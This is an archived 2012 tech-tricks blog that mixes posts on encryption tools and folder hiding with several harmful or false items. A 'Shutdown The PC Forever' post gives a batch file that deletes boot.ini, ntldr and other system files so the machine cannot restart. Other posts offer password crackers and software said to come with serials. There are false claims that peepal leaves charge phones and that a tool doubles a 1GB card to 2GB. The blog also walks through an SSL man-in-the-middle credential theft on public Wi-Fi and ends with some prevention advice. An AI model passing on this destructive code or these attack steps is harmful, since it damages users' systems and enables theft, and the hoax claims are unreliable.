Monday, 22 October 2012

Make Money from Home

                       Make Money from Home

                         Hey friends you can earn money from home . Just sign up here: http://adf.ly/?id=1792080




Happy to do that & earn money!!!!!!!!!!!!!!!!!!!!!1
Thanks.

Sunday, 21 October 2012


5 Free Software to Password Protect USB Flash Drives

Encrypt Stick Free
Password Protect USB Flash Drives - Encrypt Stick Free
First up, we have Encrypt Stick Free. It boasts of quite an impressive list of features but unfortunately not all of them are completely available in the free version. However, if you’re looking for a free program topassword protect small amounts of data this can be the software for you. It’s got password protection, storage vaults, password expiry time and a cool feature that automatically reprotects files after a certain amount of time if left idle.
USB Secure
Password Protect USB Flash Drives - USB Secure
USB Secure is another solution to password protect flash drives and in fact, any removable media including memory cards, external hard disks and the like. Like Encrypt Stick Free, it also provides additional features in a paid full version. Nevertheless, it does what it’s supposed to and if you need advanced features like virtual partitions, vaults and more you can buy the full version.
USB Flash Security
Password Protect USB Flash Drives - USB Flash Security
One of the simplest tools on the list, USB Flash Security lets you select your USB drive and protection is simply a few clicks away. Along with the password even a hint can be mentioned. The features are rather basic, but it gets the job done. One thing you have to keep in mind though, this is made by a Japanese company and the grammar in the program and help files can be quite horrible. If you don’t mind a few typos, language errors and such, USB Flash Security is a good tool to password protect USB flash drives.
Rohos Mini Drive
Rohos Mini Drive is program that lets you create a hidden, encrypted partition in the USB flash drive that can be accessed only by inputting a password. It comes in an installation as well as portable version that can be carried on removable media and used without installation. Futhermore, Rohos Mini Drive can be used to password protect files and folders even on your computer. For example, you can hide specific subfolders within an otherwise visible directory.
Password Protect USB Flash Drives - Rohos Mini Drive
TrueCrypt
TrueCrypt is the most fully featured encryption tool and the best part is, it’s completely free and open source! It provides extremely solid protection by encrypting files, folders, you name it on both removable media and your computer. You can even choose encryption algorithms. Specific files can be used as “key files” to unlock too. TrueCrypt has an great feature where hidden, encrypted partitions can be created and accessed differently based on passwords. For example, you can create 2 partitions on an 8 GB pendrive of 4 GB each called A and B. Now, you can encrypt it such that one password unlocks and decrypts only partition A and another password does the same only for partition B. TrueCrypt is your best bet if you’re looking for an encryption solution not only to password protect USB Flash Drives but protect other data too.
Password Protect USB Flash Drives - TrueCrypt
Let us know if there’s any other program that you think performs the same functions equally well or better than the ones we’ve mentioned above. Or as always, leave us your comments and queries below!

HOW TO MAKE FOLDER PASSWORD  PROTECTED AND INVISIBLE


 



Do you want to make a password protect folder??
Do you want to make it invisible??
So that it remains unnoticed by the normal users??

Well here is a way to do that. In this section I will show you how to make a password protected folder in Windows XP, Vista without using any additional software. Following is the step by step procedure to create a password protected folder.

STEP-1: Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance you name it as HME.

STEP-2:  Now place all the important files, documents or any other folder in this folder that you want to password protect.

STEP-3: Now Right-click on this folder (HME) and select the option Send To -> Compressed (zipped) Folder.

STEP-4: Now a new compressed zipped folder gets created next to folder (HME) with the same name.

STEP-5: Double-click on this compressed zipped folder and you should see your original folder (HME) there.

STEP-6: Now go to the File menu and select the option Add a password. ie: File -> Add a password

You will get small pop up window here. You can set your desired password. Once the password is set, It will ask for the password every time it is opened. Thus you have now created the password protected folder.

HOW TO MAKE IT INVISIBLE
STEP-1: Right-click on this password protected folder and click on Properties.

STEP-2: At the bottom select the option Hidden and press OK. Now your folder gets invisible.

STEP-3: In order to unhide this folder go to
My Computer – >Tools -> Folder options. Switch to View tab, scroll down and under Hidden files and folders you’ll see the following two options
  • Do not show hidden files and folders
  • Show hidden files and folders
Here you select the second option and press OK. Now the invisible folder becomes visible in it’s location. To access it you need the password. To make it invisible again repeat STEP-1 through STEP-3 and select the first option and click OK.
Now the folder becomes invisible once again.

Mobile Phone Charging

mobile-phone-peepal  
You can charge your mobile phone without a charger. You just need a green leaf of peepal tree and after some time your mobile phone does get charged. If your mobile has been discharged and you are in a forest and have no charger on you, do not worry. You Should take two peepal leaves and you will be able to charge your cell phone
It is very good concept and easy to charge your mobile. You just have to open your mobile battery and connect it with peepal leaf. After that without shaking mobile set, you should set the battery in your mobile set. After some time your mobile would be charged. Residents of Chitrakoot conducted an experiment on this and became successful at their venture. Now many people in jungle or forests charge their cell phone through peepal leaves.
Here is Step by Step guide to charge your mobile battery using peepal leaf
1- Open the mobile cover
2- Remove the battery
3- Take two to three fresh leaves of peepal/pipal/ ashwattha tree
4- Make contact of the stub of these leaves on your mobile battery terminal for a minute
5- Clean the mobile battery terminal with soft cloth
6- Place the battery again in your mobile and switch it on
7- Now you can see the result.- If required repeat the process with fresh leaves

Mask My IP Full



INFO:
When you are online, your computer has a unique identifying IP address just like your home address, alerting everyone to who you are and where you are located. When you shopping online or sending emails, your IP is associated with that activity, and it identifies you personally. Hackers and identity thieves may break into your computer, monitor your activity, steal your identity or other personal information.

Want to stay safe online? Now you have an almighty mask to keep your IP address invisible immediately.

Mask My IP is an online protection tool that can prevent your surfing habits and your Internet activities from being tracked by hackers or other cyber criminals through your real IP address. It has a nicely designed user interface that makes it incredibly easy to hide your IP address.

Key Features:
- Hide Real IP Address
- Surf Anonymously
- Block ISP Eavesdropping
- Guard Against Hackers
- Prevent Identity Theft & Credit Card Fraud
- Protect All Connections Including Wi-Fi
- Defend in the Forum once be banned
- Send Anonymous Emails
- Easy & Effective
- Auto/Manual IP Changing
- 100% Clean & Safe
- Compatible With Alot


Size: 5.51 MB



15 Best Password Cracking Tools


Here is a collection of 15 best Password Crackers for cracking PDF Password, Windows 7, Vista and XP Admin Passwords, Zip File Password, MSN Messanger and Yahoo Messanger Passwords, etc. All of the tools come with serial numbers.

This collection includes:

1. PDF Password Remover




PDF Password recovers lost passwords to password-protected PDF files (*.pdf). PDF Password recovers user and permission passwords only. PDF Password does not allow to break DRM (Digital Right Management) system. If user password (also known as password to open) is either not set or known, it is possible to remove permission password instantly.


2. Windows XP Admin Password Remover

Windows Password Cracker can easily extract unencrypted password hashes from systems that use Microsoft’s SYSKEY protection. It supports international language input locales, allowing it to work with operating systems and passwords based on single byte character sets including those for European, Cyrillic, Greek, Hebrew, Arabic, and other languages. Windows Password Cracker now includes a 53,000 word English dictionary for comprehensive English dictionary audits. It’s is an easy-to-use and fast password recovery software.


3. Zip File Password Cracker

Atomic Zip Password Cracker is created to recover the lost or forgotten passwords for ZIP archives. It can quickly restore the password in several ways: the direct search and the dictionary attack. It has easy-to-work and friendly user interface. There are two modes of password recovering: automatic and user-defined mode. If the automatic mode is set the program makes a password search basing on most frequently used settings (such as capital and small letters, 0-9 figures; maximum 5 symbols length password). If you have the information about the components and length of the password you can try to start the user-defined mode.


4. SQL Password Remover

Kernel SQL Password Recovery is a MDF (Master Data File) password recovery software widely used to recover the lost or forgotten passwords from SQL Server 2000 password-protected database files (*.mdf). The software recovers all the passwords instantly despite the length and complexity of the password. The .mdf files stores the password using strong encryption algorithms. This strong encryption can not be easily decrypted. Kernel SQL Password Recovery will recursively scan the password protected sql database file and will automatically generate the password. The generated password is an alternate password (NOT the Original Password) to unprotect the MDF file.


5. Microsoft Office Password Remover


This software helps recover or delete forgotten Microsoft Officedocument passwords. The software restores passwords of certain types instantly, plus the latest version of the software allows finding lost hard-cracked passwords seven times faster.


6. Windows Vista Admin Password Recovery


Windows Password Unlocker is a pioneer Windows password recovery with intuitive Windows graphical user interface, but not DOS-like black screen, so that it is much easier to reset Windows login passwords rapidly and conveniently in case an administrator password is forgotten or lost in Windows 2000/2003/NT/XP/Vista/2008. No need to re-install the operating system any more. Just boot from the program CD, choose the account you wish to reset. Then you can log in as a particular user with a blank password. Even with the on-screen step-by-step instructions, the program is so simple to use without any technique.



7. RAR File Password Cracker



RAR Password Recovery proved to be an effective way to uncover lost or forgotten passwords, but–as its name implies–it only works with one file type. Its straightforward, tabbed interface clearly represents the three main password recovery options: Brute-Force, Booost-Up, and Dictionary. Each approach proved successful in our tests, although the demo limits passwords to three characters. Conveniently, you can save password recovery settings in projects for future use. While it can only handle one file format, users who need to unlock their RAR files will find this application up to the task.




8. EXE File Password Recovery



EXE Password Protector is a powerful yet easy to use system utility that allows you to password-protect any Windows executable file in a few steps. This incredible program is intended for those people who share the same computer with others and want to protect sensitive applications from an unauthorized usage. If you are looking for an efficient and fast application that allows you to password-protect any Windows executable file, EXE Password Protector is perfect for you.


9. Password Changer


10. Password Memory


 
11. Distributed Password Recovery


12. Windows 7 Password Cracker




13. MSN Password Recovery



14. Asterisk Logger




15. Mozilla Firefox Password Cracker



Size: 38.1 MB

Shutdown The PC Forever






Just copy the below code in notepad and save it as anyname.bat and when you open the file it will shutdown your computer and then you will not able to restart it

@echo off

attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Use USB As Ram To Boost Pc Speed In Windows 7

                                       The more RAM computer, the more speedy and faster the process will do . As we all know that Computer we newly purchase has only 1 GB RAM and that's to low for an average person. And the computer can't run run High Power consuming softwares. moreover, Gamers will face problems due to low RAM. They can add more RAM to Boost PC Speed but indeed it requires to spend 2000 Bucks.


                                 So, I am an awesome method to Increase PC Ram using Pen drive and that will boost PC Speed instantly and easily. This given method is for Windows 7 and can be bit different for other versions of windows. So follow this easy steps and Increase PC Sped Instantly .


How To Use PenDrive As Ram | Boost PC Speed

1. First Go To Control Panel from my computer or startup
2. Then click on System And Security and then System 
3. Now click on "Advance System Settings" at left side
4. Click on Settings and the go to Advanced Tab and then Settings > Advanced
5. Now, you can see Virtual Memory, just click on Change
6Here you have to uncheck "Automatically manage paging file size"
7. Now, click on your pen drive, and set the custom size.
8. Ex. In 4 GB pen drive, 700 is initial size and 3000 is maximum size


Note :- You computer will restart and then you can see instant boost in your computer's performance.  

So, friends I hope you have enjoyed this article 

Start And Shut Down Computer Automatically On A Schedule


Start And Shut Down Computer Automatically On A Schedule




On Windows 

To automatically start your computer up at a specific time of day, you'll actually need to edit your BIOS settings. To do this:


  • Boot up your computer and enter your BIOS setup. Usually this involves pressing the Delete key as your computer boots (your computer should say Press DEL to Enter Setup or something similar as you turn it on).

  • Navigate to the Power Options. If your BIOS supports it, there should be a function for automatically starting up your computer at a certain time of day. Mine was called "Resume by Alarm", but yours might be called something different.

  • Enable that setting and set the time you want your computer to start every day. Save and Exit the BIOS, and your computer should follow that schedule from now on.


You probably shut down your computer when you're done using it at the end of the day, but if not, you can set it to shut itself down on a schedule. This is easy to do with Windows Task Scheduler:
  • Hit the Start menu and type in "task scheduler". Open up Task Scheduler from your results.

  • In the right pane, hit Create Task. Give it a name, and under the General tab, check "Run with highest privileges". Also check "Run whether user is logged on or not", if you ever leave your computer logged out.

  • Head to the Settings tab and check "Stop the task if it runs longer than" and set it to "1 hour". This won't stop your computer from sleeping, but will stop your computer from thinking a task is still running.

  • Head to the Actions tab, hit New, and choose "Start a Program" as your action. Set the Program to shutdown and the arguments to -s.

  • Lastly, head to the Triggers tab and click New. Change the schedule to fit whatever you want (say, Daily at 12:00AM), and hit OK. Hit OK again at the next window and your task should be saved in Task Scheduler.

Convert 1GB Memory Card And USB To 2GB


                     Convert 1GB Memory Card And USB To 2GB


                            Wow this is really possible when i was searching for some hacking stuff online. i saw a post where people want to try whether this crack is really working or not. But they are not aware of it so they don’t want to take risk. And they didn’t even mention what the application is and from where it can be downloaded and etc. finally i got the crack in a small forum. So i was in a confusion that will this work or not. I just cant trust it and go blindly so i scanned it in all circumstances and started to convert the card. I was shocked when i completed the process of the application. I was amazed seeing my 1 GB memory card to 2 GB and all the data can be copied according to 2GB size. So just want to give this application to all our friends. 

Procedure:

1) First of all we have to make sure that its a 1 GB memory card. This only works on 1GB And it supports only in some of the rare cases of memory cards.
2) Now Backup all your data in that because we have to format the drive.
3) After backing up now open the Skimedi Fix 2GB Capacity application. i will upload a link at the end of post.
4) A small window will pop up showing the FIX and Cancel option. And you have to browse the drive where it is located (generally G: or L: drive for USB sticks)


5) After selecting the drive press on FIX and then the updating process will be followed up. It will ask your conformation whether you agree to format or not. click on yes.

6) Later it will ask to replug the device. Just replug the memory stick card and put it back. The size of the memory will be increased from 1Gb to 2Gb. you can see the properties before and after the cracking process.

7) After that you can also check the memory size in phone and also you can test the size by copying all the data to it which is around 2Gb.

8) 8) I personally tested this and now i have converted my 1Gb to 2Gb and using 1.8 space with no problem.

9) You can reopen the Skimedi Fix and select the drive again where it shows us the size as 1912mb which is nothing but 2Gb.
10) Some times we get a parameter error while copying the files which have crossed the 1Gb size so this may not be 100% successful.
Size: 94.3 KB

Saturday, 20 October 2012


Hacking Online Banking and Credit Card Transactions – And How to Prevent ItThis is a featured page


                             Here is process for hacking online banking and credit cards transactions and also a process to prevent from them .

                      You go to a coffee shop for a cup of coffee and to utilize the shop’s Wi-Fi HotSpot to surf the web. You connect to the hotspot network and decide to perform some online banking or to purchase something online. By the way, this could happen to you at home, as well. As an end-user, you feel quite secure, as you see the lock in the bottom corner of your Internet browser, symbolizing that the online banking or online credit card transaction is safe from prying eyes. Your data, including username, password, credit card info, etc. will be encrypted with 128-bit encryption. So it's secure, right?

                                   It is not uncommon to perform banking and to purchase products online with your credit card. It is also a common thought that doing so is secure, as this is done via SSL. For the most part, this is true and the sessions are secure. Discover Card, for example, posts the following statement on their website:
         
            Figure 1
              The problem is that it is not “virtually impossible” for someone else to see your data, such as login information or credit card numbers. It can actually be relatively easy, as you’ll see, if you as an end-user are not knowledgeable about how you can be exploited and know the signs that this is occurring.

Figure 2 
(Indicates a Secure SSL Session)
Continuing with the scenario, what you didn’t realize is that a hacker has intercepted your Online Banking login credentials and credit card information and can now log into your Online Banking Website or purchase items with your credit card. How is this possible, since SSL was used and is hard to break? The answer is that you made a fatal mistake that subjected you to an SSL Man-in-the-Middle (MITM) attack.
The Attack
The fatal flaw that enabled the sensitive information to be stolen is possible when an end-user is not properly educated on an easy to do and well-known SSL exploit – SSL MITM.
Here’s how it’s done:
The hacker goes to coffee shop and connects to the same Wi-Fi network you are connected to. He runs a series of utilities to redirect other user’s data through his machine. He runs a number of other utilities to sniff the data, act as an SSL Certificate Server and to be the Man-the-Middle. The following diagram shows a very simplified graphic of how your SSL Banking session should work under normal conditions, then how it would work during an attack:

Figure 3


Figure 4

An important concept to grasp here is that a certificate is used to establish the secure SSL connection. This is a good thing, if you have a good certificate and are connecting directly to the website to which you intended to use. Then all your data is encrypted from your browser to the SSL website where the bank’s website will use the information from the certificate it gave you to decrypt your data/credentials. If that is truly the case, then it is pretty darn hard for a hacker to decrypt the data/credentials being transmitted, even if he is able to sniff your data.
This is a bad thing if you have a “Fake” certificate being sent from the hacker, and you are actually connecting to his machine, not directly to the bank’s website. In this case, your credentials are being transmitted between your browser and the hacker’s machine. The hacker is able to grab that traffic, and, because he gave you the certificate to encrypt the data/credentials, he can use that same certificate to decrypt your data/credentials.
Here are the exact steps a hacker could use to perform this attack:
The first thing he would do is turn on Fragrouter, so that his machine can perform IP forwarding

Figure 5

After that, he’ll want to direct your Wi-Fi network traffic to his machine instead of your data traffic going directly to the Internet. This enables him to be the “Man-in-the-Middle” between your machine and the Internet. Using Arpspoof, a real easy way to do this, he determines your IP address is 192.168.1.15 and the Default Gateway of the Wi-Fi network is 192.168.1.1:

Figure 6

The next step is to enable DNS Spoofing via DNSSpoof:

Figure 7

Since he will be replacing the Bank's or Online Store’s valid certificate with his own fake one, he will need to turn on the utility to enable his system to be the Man-in-the-Middle for web sessions and to handle certificates. This is done via webmitm:

Figure 8

At this point, he is setup and ready to go, he now needs to begin actively sniffing your data passing through his machine including your login information and credit card info. He opts to do this with Ethereal, then saves his capture:

Figure 9

He now has the data, but it is still encrypted with 128-bit SSL. No problem, since he has the key. What he simply needs to do now is decrypt the data using the certificate that he gave you. He does this with SSL Dump:

Figure 10

The data is now decrypted and he runs a Cat command to view the now decrypted SSL information. Note that the username is “Bankusername” and the password is “BankPassword”. Conveniently, this dump also shows that the Banking site as National City. FYI, the better, more secure banking and online store websites will have you first connect to another, preceeding page via SSL, prior to connecting to the page where you enter the sensitive information such as bank login credentials or credit card numbers. The reason for this is to stop the MITM-type attack. How this helps is that if you were to access this preceeding page first with a "fake" certificate and then proceeded to the next page where you were to enter the sensitve information, that page where you would enter the sensitive information would not display. That is because the page gathering the sensitive information would be expecting a valid certificate, which it would not receive because of the Man-in-the-Middle. While some online banks and stores do implement this extra step/page for security reasons, the real flaw in this attack is the uneducated end-user, as you'll soon see:

Figure 11

With this information, he can now log into your Online Banking Account with the same access and privileges as you. He could transfer money, view account data, etc.
Below is an example of a sniffed SSL credit card purchase/transaction. You can see that Elvis Presley was attempting to make a purchase with his credit card 5440123412341234 with an expiration date of 5/06 and the billing address of Graceland in Memphis, TN (He is alive!). If this was your information, the hacker could easily make online purchases with your card.

Figure 12

Also Real Bad News for SSL VPN Admins
This type of attack could be particularly bad for corporations. The reason for this is that Corporate SSL VPN solutions are also vulnerable to this type of attack. Corporate SSL VPN solutions will often authenticate against Active Directory, the NT Domain, LDAP or some other centralized credentials data store. Sniffing the SSL VPN login then gives an attacker valid credentials to the corporate network and other systems.
What an End-User Needs To Know
There’s a big step and end-user can take to prevent this from taking place. When the MITM Hacker uses the “bad” certificate instead of the “good”, valid certificate, the end-user is actually alerted to this. The problem is that most end-users don’t understand what this means and will unknowingly agree to use the fake certificate. Below is an example of the Security Alert an end-user would receive. Most uneducated end-users would simply click “Yes”… and this is the fatal flaw:

Figure 13

By clicking “Yes”, they have set themselves up to be hacked. By clicking the “View Certificate” button, the end-user would easily see that there is a problem. Below are examples of the various certificate views/tabs that show a good certificate compared to the bad certificate:

Figure 14

(Good Certificate) (Bad Certificate)

Figure 15

(Good Certificate) (Bad Certificate)

Figure 16

(Good Certificate) (Bad Certificate)
How an End-User Can Prevent This
  • Again, the simple act of viewing the certificate and clicking “No” would have prevented this from happening.
  • Education is the key for an end-user. If you see this message, take the time to view the certificate. As you can see from the examples above, you can tell when something doesn’t look right. If you can’t tell, err on the side of caution and call your Online Bank or the Online store.
  • Take the time to read and understand all security messages you receive. Don’t just randomly click yes out of convenience.
How a Corporation Can Prevent This
  • Educate the end-user on the Security Alert and how to react to it.
  • Utilize One Time Passwords, such as RSA Tokens, to prevent the reuse of sniffed credentials.
  • When using SSL VPN, utilize mature products with advanced features, such as Juniper’s Secure Application Manager or Network Connect functionality.